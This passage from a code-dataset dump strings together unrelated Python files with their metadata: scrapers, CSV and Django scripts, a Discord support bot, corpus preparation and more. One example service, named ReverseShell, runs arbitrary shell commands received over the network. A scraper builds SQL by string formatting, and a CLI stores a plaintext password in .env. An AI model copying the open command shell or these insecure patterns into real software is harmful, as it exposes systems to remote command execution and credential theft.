print(darenHomeUrl)\n        print(darenDesc)\n        print(updateTime)\n        '''\n        \n        sql_cmd = \"select * from t_daren_userinfo where darenId=%s\" % uid\n        rv = cur.execute(sql_cmd)\n        tup = cur.fetchone()\n        if tup:\n            print(\"exist uid\",uid)\n            sql_cmd = \"update t_daren_userinfo set darenNick=%s,darenPic=%s,authInfo=%s,darenHomeUrl=%s,darenDesc=%s,updateTime=%s where darenId=%s\"\n            #print(sql_cmd)\n            cur.execute(sql_cmd,(darenNick,darenPic,authInfo,darenHomeUrl,darenDesc,updateTime,uid))\n        else:\n            sql_cmd = \"insert into t_daren_userinfo (darenId,darenNick,darenPic,darenDesc,authInfo,darenHomeUrl) values(%s,%s,%s,%s,%s,%s)\"\n            cur.execute(sql_cmd,(uid,darenNick,darenPic,darenDesc,authInfo,darenHomeUrl))\n            #print(sql_cmd)\n            print(\"no exist uid\",uid)\n\n        conn.commit()\n        continue\n        #break\n\n    except Exception as e:\n        print(\"error %s %s %s\" % (e,uid,sql_cmd))\n        continue\n        #break\ndriver.close()\n","sub_path":"get_yhh.py","file_name":"get_yhh.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104564512","text":"import os\nimport csv\n\n\nbudget_data = '/Users/HarpreetSingh/Desktop/Python-Challenge/budget_data.csv'\n\n\nwith open(budget_data, newline=\"\") as data:\n    csvreader = csv.reader(data, delimiter=\",\")\n\n\n    next(csvreader)\n\n\n    monthavg = []\n    profits = []\n    months = []\n    avgchange = []\n\n\n    for col in csvreader:\n\n        months.append((col[0]))\n        
profits.append(int(col[1]))\n\n\n    print(\"Total Months:\", len(months))\n    print(\"Total Profits:\", sum(profits))\n\n\n    for i in range(1,len(profits)):\n        monthavg.append(profits[i] - profits[i-1])\n    avgchange = sum(monthavg)/len(monthavg)\n\n    max_profit = max(profits)\n    min_profit = min(profits)\n\n\n\n    print(\"Average Profits per Month: $\", avgchange)\n    print(\"Best Profit: $\", max_profit)\n    print(\"Worst Profit: $\", min_profit)\n\n\n","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314661354","text":"import csv\n\nfrom tunga_auth.models import TungaUser\nfrom django.core.management import BaseCommand\n\n\nclass Command(BaseCommand):\n\n    def handle(self, *args, **options):\n        \"\"\"\n        Export user logins to a CSV file\n        \"\"\"\n        # command to run: python manage.py tunga_export_user_logins\n        USER_TYPE_DEVELOPER = 1\n        USER_TYPE_PROJECT_OWNER = 2\n        USER_TYPE_PROJECT_MANAGER = 3\n        user_type = {\n            USER_TYPE_DEVELOPER: \"Developer\",\n            USER_TYPE_PROJECT_OWNER: \"Project Owner\",\n            USER_TYPE_PROJECT_MANAGER: \"Project Manager\",\n        }\n\n        users = TungaUser.objects.all().order_by('last_login')\n        row = ['First Name', 'Last Name', 'Email', 'Last Login', 'User Role']\n        with open('TungaUser.csv', 'a') as csvFile:\n            writer = csv.writer(csvFile)\n            writer.writerow(row)\n\n            for user in users:\n                writer.writerow([user.first_name, user.last_name, user.email,\n                                 user.last_login,\n                                 user_type.get(user.type, None)])\n\n        csvFile.close()\n","sub_path":"tunga_utils/management/commands/tunga_export_user_logins.py","file_name":"tunga_export_user_logins.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180645737","text":"\"\"\"Identify unprocessed identifiers.\"\"\"\n\nimport yaml\nimport click\n\nfrom dtool_azure import AzureDataSet, AzureProtoDataSet\n\n\n@click.command()\n@click.option('--config-path')\ndef main(config_path=None):\n\n    with open('analysis.yml') as fh:\n        analysis_config = yaml.load(fh, Loader=yaml.SafeLoader)\n\n    input_uuid = analysis_config['input_dataset']\n    output_uuid = analysis_config['output_dataset']\n\n    input_dataset = AzureDataSet.from_uri(input_uuid, config_path=config_path)\n    output_dataset = AzureProtoDataSet.from_uri(output_uuid)\n\n    input_identifiers = set(input_dataset.identifiers)\n\n    completed_identifiers = set([\n        output_dataset._item_metadata(identifier)['from']\n        for identifier in output_dataset._iteridentifiers()\n    ])\n\n    uncompleted_identifiers = input_identifiers - completed_identifiers\n\n    print(\"Completed {} of {}\".format(\n        len(completed_identifiers),\n        len(input_identifiers)\n    )\n    )\n\nif __name__ == '__main__':\n    main()\n","sub_path":"scripts/find_uncompleted.py","file_name":"find_uncompleted.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642933570","text":"import argparse\nimport read_commands\nimport handle_internal_storage as stor\nimport util.api_token_gen as token_gen\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-y\",\"--yaml_files\", type=str,\n                    help=\"YAML files containing commands for the FarmBot, comma separated with NO spaces.\")\nparser.add_argument(\"-m\",\"--map\", type=str, default=None,\n                    help=\"a single CSV file containing the map of plant locations.\")\nparser.add_argument(\"-d\",\"--delete\", type=str,\n                    help=\"a) 'all', or b) a list 
of commands to delete, comma separated with NO spaces.\")\nparser.add_argument(\"-i\",\"--login\", type=str, nargs=2,\n                    help=\"Login to your FarmBot using your existing account. If this option is not chosen, the program will assume you are still logged in from last time.\")\nparser.add_argument(\"-o\",\"--logout\", type=str,\n                    help=\"Log out of the FarmBot WebApp.\")\n\nargs = parser.parse_args()\n# remember to change 'myFile' to the name of User Manual\n# parser.add_argument(\"-h\", \"--help\", dest=\"myFile\", help=\"open user manual\")\n\n# myFile = args.myFile\n# text = open(myFile)\n# print(text.read())\n\nif args.login:\n    token = token_gen.get_token(args.login[0], args.login[1])\n\n    # login with new username and password -> generate a new .env file\n    file = open(\".env\", \"w+\")\n    file.write(\"EMAIL=\\\"\" + args.login[0] + \"\\\"\\n\")\n    file.write(\"PASSWORD=\\\"\" + args.login[1] + \"\\\"\\n\")\n    file.write(\"TOKEN=\\\"\" + token + \"\\\"\\n\")\n    file.close()\nif args.logout:\n    # delete the content of .env file\n    file = open(\".env\", \"r+\")\n    file.truncate(0)\n\n\nif args.delete:\n    print(\"not here\")\n    if args.delete == \"all\":\n        stor.delete_all()\n    else:\n        objects = args.delete.split(',')\n        for obj in objects:\n            stor.delete_object(obj)\nif args.yaml_files:\n    action_handler = read_commands.ActionHandler(args.yaml_files.split(','), args.map)\n    print(action_handler.load_commands())\n","sub_path":"farmbot/farmbot.py","file_name":"farmbot.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540088893","text":"import discord\nimport random\nfrom datetime import datetime\nfrom discord.ext import commands\n\n\nclass SupportCog(commands.Cog):\n    def __init__(self, bot, category_id):\n        self.bot = bot\n        self.category_id = int(category_id)\n        self.playing = \"DMでサポート受付 | v3.1\"\n        self.mention_describe = \"\"\"\n・質問\n・リクエスト\n・バグ報告\n・通報\n・BAN解除申請\n・その他運営のサポートが必要\n\nいずれかに該当する場合は、このボットにDMを送信してください。\nボットを通して運営が対応いたします。\n\"\"\"\n        self.reply_fails = \"\"\"\n> 返信先のDMが見つかりません。\n\n・ユーザーをボットが認識できる場合\n```\nウェブフックを編集して改善できます。\n1. チャンネルのウェブフックが存在しない場合は作成してください。\n2. 
ウェブフックの名前を正しい返信先のユーザーIDに置き換えてください。\n```\n・ユーザーをボットが認識できない場合\n```\n返信する手段がありません。\nサポートを終了してください。\n```\n\"\"\"\n\n def create_embed(self, message):\n c = random.randint(0, 0xFFFFFF)\n embed = discord.Embed(color=discord.Colour(c), timestamp=datetime.now())\n embed.set_author(name=message.author, icon_url=message.author.avatar_url)\n embed.set_footer(text=self.bot.user.name, icon_url=self.bot.user.avatar_url)\n\n if message.content:\n embed.add_field(name=\"内容\", value=message.content)\n\n files = \"\\n\".join([a.url for a in message.attachments])\n if files:\n embed.add_field(name=\"添付ファイル\", value=files, inline=False)\n\n return embed\n\n async def create(self, category, topic, hook_name):\n id = random.randint(100000, 1000000)\n channel = await category.create_text_channel(f\"サポート{id}番\", topic=topic)\n hook = await channel.create_webhook(name=hook_name)\n return channel, hook\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"{self.bot.user} でログイン完了!\")\n\n await self.bot.change_presence(activity=discord.Game(self.playing))\n print(f\"プレイ中のゲームを {self.playing} に変更しました。\")\n\n self.category = self.bot.get_channel(self.category_id)\n print(f\"カテゴリーは {self.category} です。\")\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if message.author.bot:\n return\n\n if self.bot.user in message.mentions:\n await message.channel.send(self.mention_describe)\n\n if message.channel in self.bot.private_channels:\n hooks = await self.category.guild.webhooks()\n hook_name = str(message.author.id)\n hook = discord.utils.find(lambda w: w.name == hook_name, hooks)\n\n if not hook:\n _, hook = await self.create(self.category, message.content, hook_name)\n await message.channel.send(\"> サポートを新たに開始しました!\")\n\n await hook.channel.send(embed=self.create_embed(message))\n await message.add_reaction(\"\\N{BALLOT BOX WITH CHECK}\")\n\n if message.channel in self.category.text_channels:\n hooks = await message.channel.webhooks()\n hook = discord.utils.find(lambda w: w.channel == message.channel, hooks)\n\n try:\n assert hook\n author_id = int(hook.name)\n author = self.bot.get_user(author_id)\n assert author\n except (ValueError, AssertionError):\n await message.channel.send(self.reply_fails)\n await message.add_reaction(\"\\N{CROSS MARK}\")\n return\n\n dm = await author.create_dm()\n\n await dm.send(embed=self.create_embed(message))\n await message.add_reaction(\"\\N{BALLOT BOX WITH CHECK}\")\n\n @commands.command(help=\"このボットを終了します。 (管理者のみ)\")\n async def stop(self, ctx):\n if await self.bot.is_owner(ctx.author):\n print(f\"{ctx.author} からの命令により終了中...\")\n await ctx.send(\"ボットを終了しています...\")\n await self.bot.logout()\n else:\n await ctx.send(\"ボットを終了するにはこのボットの管理者である必要があります!\")\n","sub_path":"cogs/supportcog.py","file_name":"supportcog.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459207174","text":"#graph1.py\r\n\r\nfrom pygame import *\r\nfrom random import *\r\n\r\nscreen = display.set_mode((800, 600))\r\nrunning = True\r\n\r\nscreen.fill((247, 110, 110))\r\ndef distform(x1, y1, x2, y2):\r\n return int(((x1-x2)**2+(y1-y2)**2)**(1/2))\r\n\r\nscreen.fill((247, 110, 110))\r\n\r\nwhile running:\r\n for e in event.get():\r\n if e.type == QUIT:\r\n running = False\r\n if e.type == MOUSEBUTTONDOWN:\r\n screenPic = screen.copy()\r\n #--------------------------------------------\r\n mb = mouse.get_pressed()\r\n mx, my = mouse.get_pos()\r\n if mb[0] == 1:\r\n screen.blit(screenPic, 
(0,0))\r\n                mouse.set_visible(False)\r\n                draw.circle(screen, (0,255,0), (mx, my), 25)\r\n                draw.circle(screen, (50,50,50), (mx, my), 26, 2)\r\n            elif mb[2] == 1:\r\n                screen.fill((247, 110, 110))\r\n                mouse.set_visible(True)    \r\n    #--------------------------------------------\r\n    display.flip()\r\n\r\nquit()\r\n    \r\n","sub_path":"Pygame Exercises/graphex11.py","file_name":"graphex11.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"162288476","text":"import json\nimport os\nimport random\n\nimport numpy as np\nimport pymongo\nimport re\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport pandas as pd\nimport requests\nfrom tqdm import tqdm\n\nfrom configuration.config import treatment_data_path\n\n\ndef p1_read_csv(input_file, multi_label=False):\n    def normalize(text, enable=True):\n        if enable:\n            text = text.replace('菊花', '肛门')\n            text = text.replace('啪啪', '性交')\n            text = text.replace('蛋蛋', '阴囊')\n            text = text.replace('小弟弟', '阴茎')\n            text = text.replace('腘窝', '膝盖后面')\n        return text\n\n    df = pd.read_csv(input_file)\n\n    sym_alias_mappings = {}\n    sym_utts_mappings = defaultdict(list)\n\n    total_symptom = df['症状名称'][df['症状名称'].notnull()].values\n\n    for row in df.iterrows():\n        utt = row[1]['提问']\n        if str(utt) == 'nan':\n            continue\n        # 1. symptom name\n        if str(row[1]['症状名称']) != 'nan':\n            symptom_name = re.sub('[\\t\\n]', '', row[1]['症状名称']).rstrip()\n            curr_symptom_name = symptom_name\n        else:\n            symptom_name = curr_symptom_name\n        # aliases\n        if str(row[1]['别称']) != 'nan':\n            alias = row[1]['别称'].split()\n            alias = list(map(lambda x: normalize(x), alias))\n            sym_alias_mappings.update({symptom_name: alias})\n        # filter out generic question utterances\n        if any(keyword in utt for keyword in ['是什么原因', '该怎么治', '要做什么检查', '应注意什么', '看什么医生', '去看什么科', '去哪家医院比较好']):\n            continue\n\n        utt = normalize(utt)\n        if multi_label:\n            # multi-label\n            sym_list = [t for t in row[1].values[3:] if str(t) != 'nan' and t in total_symptom] + [symptom_name]\n            sym_list.sort()\n            sym_labels = '_'.join(sym_list)\n            sym_utts_mappings[sym_labels].append(utt)\n        else:\n            # single-label\n            sym_utts_mappings[symptom_name].append(utt)\n\n    print(f'symptom total num: {len(sym_utts_mappings.keys())}')\n    print(f'symptom with alias num: {len(sym_alias_mappings.keys())}')\n    print(f'alias num: {sum(map(len, sym_alias_mappings.values()))}')\n    print(f'utts num: {sum(map(len, sym_utts_mappings.values()))}')\n    print(f'avg utt num per class: {np.average(list(map(len, sym_utts_mappings.values())))}')\n\n    return sym_utts_mappings, sym_alias_mappings\n\n\ndef p2_filter_api():\n    # run load_db() first\n    db_symp = json.load((Path(treatment_data_path) / 'expand_data/db_symp.json').open())\n    total_symp_names = db_symp['total_symp_names']\n    total_sign_names = db_symp['total_sign_names']\n\n    return total_symp_names, total_sign_names\n\n\ndef p3_export_2_json():\n    # load filter\n    total_symp_names, total_sign_names = p2_filter_api()\n\n    # 1.read csv\n    # 2.filter invalid\n    # 3.write to json\n    file_list = ['体征词0322.csv', '体征词0328.csv', '症状词0308.csv', '症状词0322.csv', '症状词0328.csv']\n    for fn in file_list:\n        print(fn)\n        s_type = 'symptom' if '症状' in fn else 'sign'\n\n        output_dic = defaultdict(list)\n\n        input_path = Path(treatment_data_path) / 'raw' / fn\n        sym_utts_mappings, sym_alias_mappings = p1_read_csv(input_path)\n\n        for sym, utts in sym_utts_mappings.items():\n\n            # filter out symptoms/signs that do not exist in the db\n            if (s_type == 'symptom' and sym not in total_symp_names) or (s_type == 'sign' and sym not in total_sign_names):\n                print(f'Not Exist in db. 
{fn} -- {sym}')\n                continue\n\n            output_dic[s_type].append({\n                s_type + '_name': sym,\n                'alias': sym_alias_mappings[sym],\n                'utterances': utts\n            })\n\n        json.dump(output_dic, (Path(treatment_data_path) / 'raw_json' / fn.replace('csv', 'json')).open('w'), ensure_ascii=False)\n\n\ndef p4_json_2_mongo():\n    db_name = 'local_db'\n    collection_name = 'corpus_symptom'\n    mdb = pymongo.MongoClient()[db_name].get_collection(collection_name)\n\n    input_path = Path(treatment_data_path) / 'raw_json'\n    for fn in input_path.iterdir():\n        symp_type = 'symptom' if '症状' in fn.name else 'sign'\n        version = fn.name.split('.')[0]\n\n        dic = json.load(fn.open())\n\n        key = symp_type + '_name'\n        for doc in dic[symp_type]:\n\n            # skip documents that already exist (dedupe)\n            res = mdb.find({key: doc[key], 'data_type': 'train'})\n            if res.count() > 0:\n                print(f'Existed in mongodb. {doc[key]} -- {fn.name}')\n                print(doc)\n                print('-' * 50)\n                continue\n\n            doc.update({\n                'symp_type': symp_type,\n                'version': version,\n                'data_type': 'train'\n            })\n\n            mdb.update_one(filter={key: doc[key], 'data_type': 'train'},\n                           update={\"$set\": doc}, upsert=True)\n\n\ndef p5_split_train_dev():\n    db_name = 'local_db'\n    collection_name = 'corpus_symptom'\n    mdb = pymongo.MongoClient()[db_name].get_collection(collection_name)\n\n    res = mdb.find({'data_type': 'train'})\n    train_dic, train = defaultdict(list), []\n    label_list = []\n    for doc in res:\n        symp_type = doc['symp_type']\n        if ' ' in doc[symp_type + '_name']:\n            continue\n        utterances = list(map(lambda x: re.sub('\\r*\\n*', '', x), doc['utterances']))\n        if symp_type == 'symptom':\n            label = doc['symptom_name']\n            train_dic[label].extend(utterances)\n            train.extend([f'{label} {a}' for a in doc['alias']])\n            train.append(f'{label} {label}')\n        else:\n            label = doc['sign_name']\n            train.extend([f'{label} {utt}' for utt in utterances])\n            train.extend([f'{label} {a}' for a in doc['alias']])\n            train.append(f'{label} {label}')\n        label_list.append(label)\n\n    dev = []\n    for label, utts in train_dic.items():\n        dev_utts = random.sample(utts, 0 if len(utts) * 0.2 < 1 else int(len(utts) * 0.2))\n        train_utts = [u for u in utts if u not in dev_utts]\n\n        dev.extend([f'{label} {utt}' for utt in dev_utts])\n        train.extend([f'{label} {utt}' for utt in train_utts])\n\n    test = train\n    train = list(np.random.permutation(train * 5))\n\n    chat_path = (Path(treatment_data_path) / 'chat_corpus.txt')\n    chat_corpus = [line.strip() for line in chat_path.open()]\n    selected_chat = random.sample(chat_corpus, 70)\n    train.extend([f'负样本 {u}' for u in selected_chat[:50]])\n    dev.extend([f'负样本 {u}' for u in selected_chat[50:]])\n    test.extend([f'负样本 {u}' for u in selected_chat[:50]])\n\n    # sent size\n    train_sent_size = list(map(lambda x: len(x.split()[1]), train))\n    dev_sent_size = list(map(lambda x: len(x.split()[1]), dev))\n    print(f'sent size avg: {np.average(train_sent_size)}, max: {np.max(train_sent_size)}, min: {np.min(train_sent_size)}')\n    print(f'sent size avg: {np.average(dev_sent_size)}, max: {np.max(dev_sent_size)}, min: {np.min(dev_sent_size)}')\n\n    # save\n    train_writer = (Path(treatment_data_path) / 'train_1.txt').open('w')\n    dev_writer = (Path(treatment_data_path) / 'dev_1.txt').open('w')\n    test_writer = (Path(treatment_data_path) / 'test_1.txt').open('w')\n\n    train_writer.writelines([l + '\\n' for l in train])\n    dev_writer.writelines([l + '\\n' for l in dev])\n    test_writer.writelines([l + '\\n' for l in test])\n\n    label_list.append('负样本')\n    json.dump(label_list, (Path(treatment_data_path) / 'label_list.json').open('w'), ensure_ascii=False)\n\n\ndef p6_test_to_mongo():\n    
import pandas as pd\n    base_path = '/Users/fengfan/Downloads/bx_ai诊疗'\n    test_path = (Path(treatment_data_path) / '测试集.txt').open('w')\n    for fn in Path(base_path).iterdir():\n        if not fn.name.startswith('测试集'):\n            continue\n\n        df = pd.read_excel(fn)\n\n        for row in df.iterrows():\n            utt = row[1]['提问语料']\n            if str(utt) == 'nan':\n                continue\n            utt = re.sub('\\r*\\n*', '', utt)\n            utt = re.sub(' ', ',', utt)\n\n            # symptom term column\n            if str(row[1]['症状词']) != 'nan':\n                symptom_name = re.sub('[\\t\\n\\s]', '', row[1]['症状词'])\n                curr_symptom_name = symptom_name\n            else:\n                symptom_name = curr_symptom_name\n\n            level = int(row[1]['难度系数'])\n\n            test_path.write(f'{symptom_name}\\t{utt}\\t{level}\\n')\n\n\nif __name__ == '__main__':\n    p6_test_to_mongo()","sub_path":"pytorch_classification/prepare_symptom_data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265952217","text":"# build the matrix\nimport csv\nimport numpy as np\nimport pandas as pd\ndef fea(text):\n    import csv\n    with open(text) as f:\n        rows = csv.reader(f)\n        res=[]\n        num=0\n        for row in rows:\n            num+=1\n            for i in range(len(row)):\n                if row[i]!='':\n                    res.append(row[i])\n    fea = list(set(res))\n    return fea,num\nres,rownum=fea('/Users/hhy/Desktop/2/test.csv')\ncol=len(res)\nwith open('/Users/hhy/Desktop/2/fea.csv', 'w', encoding='gb18030', newline='') as f:\n    writer = csv.writer(f)\n    writer.writerow(res)\n\ndic={}\n\n# build an empty dict\nfor i in range(rownum):\n    dic[str(i)]=[]\nwith open('/Users/hhy/Desktop/2/test.csv') as csvfile1:\n    rows = csv.reader(csvfile1)\n    i=0\n    # add words to the dict keyed by row index\n    for row in rows:\n        if i <= rownum:\n            for j in range(len(row)):\n                if row[j]!='':\n                    dic[str(i)].append(str(row[j]))\n            i+=1\n#print(dic)\n\n# build the matrix\nb=np.zeros((rownum,col))\na=b.astype(int)\nfor i in range(len(res)):\n    for j in range(rownum):\n        if res[i] in dic[str(j)]:\n            a[j][i]=1\nprint(len(a))\ndata1 = pd.DataFrame(a)\nprint(len(data1))\ndata1.to_csv('/Users/hhy/Desktop/2/newtest.csv')\n","sub_path":"sentiment/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641693933","text":"import asyncio\nfrom asyncio.subprocess import PIPE, STDOUT\n\nfrom merlin.core import Service, OpCode\nfrom merlin.ext.ui import TcpServer\n\n\nclass ReverseShell(Service, TcpServer):\n    @Service.listener(OpCode.Data)\n    async def on_data(self, packet):\n        process = await asyncio.create_subprocess_shell(packet.data, stdout=PIPE, stderr=STDOUT)\n\n        try:\n            stdout, _ = await process.communicate()\n        except Exception as err:\n            stdout = str(err).encode('utf-8')\n\n        await packet.ack(stdout.decode('utf-8'))\n\n    @Service.listener(OpCode.Ack)\n    async def on_ack(self, packet):\n        print('Received ack: ', repr(packet))\n\n    # TCP Server\n\n    @TcpServer.client_connected\n    async def tcp_server_callback(self, reader, writer):\n        async def callback(packet):\n            writer.write('{0}:{1}'.format(str(packet.author), str(packet.data)).encode('utf-8'))\n            await writer.drain()\n\n        while True:\n            data = (await reader.readline()).decode().strip()\n\n            if data == 'exit':\n                writer.close()\n                await writer.wait_closed()\n                break\n            else:\n                await self._client.send_packet(op=OpCode.Data, data=data, ack_cb=callback)\n","sub_path":"examples/simple_shell/tcp.py","file_name":"tcp.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"465787503","text":"# coding:utf-8\n\nimport numpy as np\n\n\nclass RNNConfig(object):\n\n def __init__(self):\n self.init_scale = 0.1\n self.learning_rate = 1.0\n self.max_grad_norm = 5\n self.num_layers = 2\n self.num_steps = 20\n self.hidden_size = 200\n self.max_epoch = 4\n self.max_max_epoch = 13\n self.keep_prob = 1.0\n self.lr_decay = 0.5\n self.batch_size = 20\n self.vocabulary_size = 10000\n self.output_size = self.vocabulary_size\n self.embedding_init = np.array(np.random.normal(size=(self.vocabulary_size, self.hidden_size)), dtype=np.float32)\n\n def set_embedding_random(self, vocabulary_size, embedding_size):\n self.embedding_init = np.array(np.random.normal(size=(vocabulary_size, embedding_size)), dtype=np.float32)\n\n def set_embedding(self, embedding):\n self.embedding_init = np.array(embedding, dtype=np.float32)\n\nclass SmallConfig(RNNConfig):\n\n def __init__(self):\n \"\"\"Small config.\"\"\"\n RNNConfig.__init__(self)\n\n\nclass MediumConfig(RNNConfig):\n\n def __init__(self):\n \"\"\"Medium config.\"\"\"\n RNNConfig.__init__(self)\n self.learning_rate = 1.0\n self.init_scale = 0.05\n self.num_steps = 40\n self.hidden_size = 650\n self.max_epoch = 6\n self.max_max_epoch = 39\n self.keep_prob = 0.5\n self.lr_decay = 0.8\n\n\nclass LargeConfig(RNNConfig):\n def __init__(self):\n \"\"\"Large config.\"\"\"\n RNNConfig.__init__(self)\n self.init_scale = 0.04\n self.max_grad_norm = 10\n self.num_steps = 40\n self.hidden_size = 1500\n self.max_epoch = 14\n self.max_max_epoch = 55\n self.keep_prob = 0.35\n self.lr_decay = 1 / 1.15\n\n\nclass TinyConfig(RNNConfig):\n\n def __init__(self):\n \"\"\"Tiny config for test\"\"\"\n RNNConfig.__init__(self)\n self.max_grad_norm = 1\n self.num_layers = 1\n self.num_steps = 2\n self.hidden_size = 2\n self.max_epoch = 1\n self.max_max_epoch = 1\n self.keep_prob = 1.0\n self.lr_decay = 0.5\n\n\n\n","sub_path":"model/rnn_lstm/rnn_config.py","file_name":"rnn_config.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48150949","text":"#!/usr/bin/env python\r\n\r\nimport os.path\r\nimport string\r\nimport sys\r\nimport TestSCons\r\n\r\n_python_ = TestSCons._python_\r\n\r\ntest = TestSCons.TestSCons()\r\n\r\nargs = \"--debug=explain\"\r\n\r\ntest.subdir('src')\r\n\r\ntest.write(['src', 'SConstruct'],\"\"\"\r\nenv = Environment()\r\n\r\ndef action( source, target, env ):\r\n target[0].get_csig()\r\n f = open( str(target[0]), 'w' )\r\n for s in source:\r\n f.write( s.get_contents() )\r\n f.close()\r\n\r\nbuilder = env.Builder( action=action )\r\n\r\nbuilder( env, target = \"target.txt\", source = \"source.txt\" )\r\n\"\"\")\r\n\r\ntest.write([\"src\", \"source.txt\"], \"a\" )\r\n\r\n\r\n## first build\r\nexpect_build = test.wrap_stdout(\"\"\"\\\r\nscons: building `target.txt' because it doesn't exist\r\naction([\"target.txt\"], [\"source.txt\"])\r\n\"\"\")\r\n\r\ntest.run(chdir='src', arguments=args, stdout=expect_build )\r\n\r\n\r\n## now change source.txt\r\ntest.write([\"src\", \"source.txt\"], \"b\" )\r\n\r\n## second build\r\nexpect_rebuild = test.wrap_stdout(\"\"\"\\\r\nscons: rebuilding `target.txt' because `source.txt' changed\r\naction([\"target.txt\"], [\"source.txt\"])\r\n\"\"\")\r\n\r\ntest.run(chdir='src', arguments=args, stdout=expect_rebuild 
)\r\n\r\n","sub_path":"1686/203/explain_exception.py","file_name":"explain_exception.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556460713","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom datetime import date, timedelta\nfrom functools import lru_cache\nimport json\n\nfrom .models import Client\nfrom mrc.utils.webo_api import WcmApi, make_api_object_from_client\n\nSESSION_NAME = 'mrc-in'\n\n\n# 200 response needed by WAM\ndef index(req):\n return HttpResponse('Use WAM interface to login.')\n\n\ndef login(req):\n try:\n try:\n del req.session[SESSION_NAME]\n except Exception:\n print(\"No session.\")\n c = Client.objects.get(wam_id=req.GET['aid'])\n token = req.GET['token']\n except (Client.DoesNotExist, KeyError, ValueError) as err:\n return HttpResponse('Error: {0}'.format(err))\n # client = get_object_or_404(Client, wam_id=req.GET['aid'])\n wam_api = make_api_object_from_client(c, token)\n if not wam_api.auth_is_valid():\n return HttpResponse(('Use WAM interface to login.'))\n\n req.session[SESSION_NAME] = True\n req.session['aid'] = req.GET['aid']\n req.session['token'] = token\n return redirect('mrc:report')\n\n\n@lru_cache(maxsize=5)\ndef _get_wcm_data(from_date, end_date, wcm_id):\n w = WcmApi(wcm_id)\n return w.get_data(from_date, end_date, wcm_id)\n\n\ndef report(req):\n if not req.session.get(SESSION_NAME):\n return HttpResponse('Use WAM interface to login.')\n client = Client.objects.get(wam_id=req.session.get('aid'))\n yesterday = date.today() - timedelta(1)\n yesterday = yesterday.strftime('%Y-%m-%d')\n dates = {'from_date': yesterday,\n 'end_date': yesterday}\n selected_project_id = None\n selected_campaign_id = None\n if req.method == 'POST':\n if req.POST['from-date']:\n dates['from_date'] = req.POST['from-date']\n if req.POST['end-date']:\n dates['end_date'] = req.POST['end-date']\n if req.POST['project-id']:\n selected_project_id = req.POST['project-id']\n if req.POST['campaign-id']:\n selected_campaign_id = req.POST['campaign-id']\n\n data = _get_wcm_data(dates['from_date'], dates['end_date'], client.wcm_id)\n\n needed_metrics = {'impression': 'int', 'click': 'int', 'reach_impression': 'int', 'completion_rate': 'float',\n 'mrc_visibility_rate': 'float'}\n needed_custom_events = {'MRCViewable': 'int', 'MRCUnviewable': 'int'}\n\n # Getting names (labels)\n proj_camp_data_json = []\n\n campaigns = {}\n for campaign_id in data['metadata']['campaign']:\n label = data['metadata']['campaign'][campaign_id]['label']\n campaigns[campaign_id] = label\n\n projects = {}\n projects_data = data['data']['project']\n for project in data['metadata']['project']:\n label = data['metadata']['project'][project]['label']\n projects[project] = label\n selected = False\n if selected_project_id is None:\n selected_project_id = project\n selected = True\n elif selected_project_id == project:\n selected = True\n proj_obj = {'id': project, 'label': label, 'selected': selected, 'campaigns': []}\n\n project_id = project\n for campaign_id in projects_data[project_id]['campaign']:\n selected = False\n if proj_obj['selected']:\n if selected_campaign_id is None:\n selected_campaign_id = campaign_id\n selected = True\n elif selected_campaign_id == campaign_id:\n selected = True\n capm_obj = {'id': campaign_id, 'label': campaigns[campaign_id], 'selected': selected}\n proj_obj['campaigns'].append(capm_obj)\n\n proj_camp_data_json.append(proj_obj)\n\n mrc_events = {}\n for event 
in data['metadata']['custom_event']:\n        label = data['metadata']['custom_event'][event]['label']\n        if label in needed_custom_events:\n            mrc_events[event] = label\n\n    ad_spaces = {}\n    for ad_space in data['metadata']['ad_space']:\n        label = data['metadata']['ad_space'][ad_space]['label']\n        ad_spaces[ad_space] = label\n\n    # Getting data\n    selected_project_data = {'id': selected_project_id}\n\n    for campaign_id in projects_data[selected_project_id]['campaign']:\n        selected_project_data[campaign_id] = {'label': campaigns[campaign_id]}\n        if selected_campaign_id is None:\n            selected_campaign_id = campaign_id\n\n    selected_campaign_data = {'id': selected_campaign_id}\n    ad_space_data = projects_data[selected_project_id]['campaign'][selected_campaign_id]['ad_space']\n    for ad_space_id in ad_space_data:\n        selected_campaign_data[ad_space_id] = {'label': ad_spaces[ad_space_id]}\n        try:\n            for metric in needed_metrics:\n                metric_value = None\n                if metric in ad_space_data[ad_space_id]['metrics']:\n                    metric_value = ad_space_data[ad_space_id]['metrics'][\n                        metric]\n                if metric_value is None:\n                    pass\n                elif needed_metrics[metric] == 